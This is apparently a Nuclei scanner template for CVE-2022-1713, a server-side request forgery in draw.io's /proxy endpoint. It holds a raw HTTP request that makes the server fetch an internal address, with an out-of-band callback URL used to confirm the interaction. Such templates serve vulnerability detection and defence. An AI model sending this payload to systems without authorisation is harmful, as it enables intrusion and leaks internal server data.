id: CVE-2022-1713

info:
  name: SSRF on /proxy in GitHub repository jgraph/drawio
  author: pikpikcu
  severity: high
  description: SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1713
    - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
  tags: cve,cve2022,drawio,ssrf

requests:
  - raw:
    - |
        GET /proxy?url=http%3a//0:8080/ HTTP/1.1
        Host: {{Hostname}}
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Referer: {{Hostname}}/?mode=device&title=Untitled%20Diagram.drawio.xml&create=https%3A%2F%2F{{interactsh-url}}%2F&sync=manual&db=0&gh=0&tr=0&gapi=0&od=0&gl=0
        Accept-Encoding: gzip, deflate
        Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
          - "dns"